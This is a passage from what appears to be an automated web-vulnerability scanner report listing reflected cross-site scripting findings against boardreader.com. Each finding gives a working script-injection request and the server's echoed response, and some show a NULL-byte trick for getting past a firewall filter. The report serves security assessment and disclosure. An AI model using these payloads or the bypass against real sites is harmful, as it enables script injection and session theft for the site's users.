Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:58:55 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:59:00 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>
       
            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=myegy.com&c1683'-alert(1)-'aae0d7e564f=1&p=30&d=1288940340&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';
       
if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

1.91. http://boardreader.com/domain/nolanfans.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/nolanfans.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e7be"><script>alert(1)</script>8eb8f9da978 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/nolanfans.com?2e7be"><script>alert(1)</script>8eb8f9da978=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:53 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:09 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/nolanfans.com?2e7be"><script>alert(1)</script>8eb8f9da978=1">
...[SNIP]...

1.92. http://boardreader.com/domain/nolanfans.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/nolanfans.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9419e'-alert(1)-'6dbeba69c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domain/nolanfans.com?9419e'-alert(1)-'6dbeba69c1=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:53:22 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:24 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>
       
            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=nolanfans.com&9419e'-alert(1)-'6dbeba69c1=1&p=30&d=1288940004&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';
       
if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

1.93. http://boardreader.com/domain/ratedesi.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/ratedesi.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffe4a"><script>alert(1)</script>5a4d6909fb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/ratedesi.com?ffe4a"><script>alert(1)</script>5a4d6909fb2=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:53:30 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:31 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/ratedesi.com?ffe4a"><script>alert(1)</script>5a4d6909fb2=1">
...[SNIP]...

1.94. http://boardreader.com/domain/ratedesi.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/ratedesi.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8f15'-alert(1)-'e30e737b55a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domain/ratedesi.com?d8f15'-alert(1)-'e30e737b55a=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:54:06 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:54:08 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>
       
            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=ratedesi.com&d8f15'-alert(1)-'e30e737b55a=1&p=30&d=1288940048&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';
       
if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

1.95. http://boardreader.com/domain/sherdog.net [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/sherdog.net

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9c1b"><script>alert(1)</script>c6dc46feb64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/sherdog.net?d9c1b"><script>alert(1)</script>c6dc46feb64=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:53:15 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:17 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/sherdog.net?d9c1b"><script>alert(1)</script>c6dc46feb64=1">
...[SNIP]...

1.96. http://boardreader.com/domain/sherdog.net [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/sherdog.net

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3fd25'-alert(1)-'46ee574fc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domain/sherdog.net?3fd25'-alert(1)-'46ee574fc5=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:53:27 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:29 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>
       
            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=sherdog.net&3fd25'-alert(1)-'46ee574fc5=1&p=30&d=1288940009&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';
       
if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

1.97. http://boardreader.com/domain/ufc.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/ufc.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3b68"><script>alert(1)</script>31e4bcbef97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/ufc.com?f3b68"><script>alert(1)</script>31e4bcbef97=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:45 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:52:46 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/ufc.com?f3b68"><script>alert(1)</script>31e4bcbef97=1">
...[SNIP]...

1.98. http://boardreader.com/domain/ufc.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/ufc.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2be3e'-alert(1)-'8c796450d60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domain/ufc.com?2be3e'-alert(1)-'8c796450d60=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:53:13 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:15 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>
       
            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=ufc.com&2be3e'-alert(1)-'8c796450d60=1&p=30&d=1288939995&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';
       
if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

1.99. http://boardreader.com/domain/websitetoolbox.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/websitetoolbox.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f166'-alert(1)-'182d880e185 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domain/websitetoolbox.com?3f166'-alert(1)-'182d880e185=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:53:17 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:31 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>
       
            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=websitetoolbox.com&3f166'-alert(1)-'182d880e185=1&p=30&d=1288940011&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';
       
if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

1.100. http://boardreader.com/domain/websitetoolbox.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/websitetoolbox.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a2db"><script>alert(1)</script>3a4a3e5c070 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/websitetoolbox.com?9a2db"><script>alert(1)</script>3a4a3e5c070=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:32 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:52:34 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/websitetoolbox.com?9a2db"><script>alert(1)</script>3a4a3e5c070=1">
...[SNIP]...

1.101. http://boardreader.com/domain/worldmastiffforum.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/worldmastiffforum.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c581"><script>alert(1)</script>99d3eb93754 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/worldmastiffforum.com?2c581"><script>alert(1)</script>99d3eb93754=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:21 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:52:30 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/worldmastiffforum.com?2c581"><script>alert(1)</script>99d3eb93754=1">
...[SNIP]...

1.102. http://boardreader.com/domain/worldmastiffforum.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/worldmastiffforum.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bbef'-alert(1)-'5ee0da9ec64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domain/worldmastiffforum.com?4bbef'-alert(1)-'5ee0da9ec64=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:45 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:52:50 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>
       
            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=worldmastiffforum.com&4bbef'-alert(1)-'5ee0da9ec64=1&p=30&d=1288939970&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';
       
if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

1.103. http://boardreader.com/index.php [ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /index.php

Issue detail

The value of the ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004177f"><script>alert(1)</script>0da953a680a was submitted in the ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d parameter. This input was echoed as 4177f"><script>alert(1)</script>0da953a680a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1%004177f"><script>alert(1)</script>0da953a680a&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:27:18 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close


           <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <title>s0.2md
...[SNIP]...
<A onclick="" href="./index.php?o=10&a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1%004177f"><script>alert(1)</script>0da953a680a&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext">
...[SNIP]...

1.104. http://boardreader.com/index.php [extended_search parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /index.php

Issue detail

The value of the extended_search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 484f3"><script>alert(1)</script>8c7809fc22a was submitted in the extended_search parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1484f3"><script>alert(1)</script>8c7809fc22a&ltype=ext HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:28:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close


           <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <title>s0.2md
...[SNIP]...
lick="" href="./index.php?o=10&a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1484f3"><script>alert(1)</script>8c7809fc22a&ltype=ext">
...[SNIP]...

1.105. http://boardreader.com/index.php [ltype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /index.php

Issue detail

The value of the ltype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b85f1"><script>alert(1)</script>8330a287d66 was submitted in the ltype parameter. This input was echoed as b85f1"><script>alert(1)</script>8330a287d66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

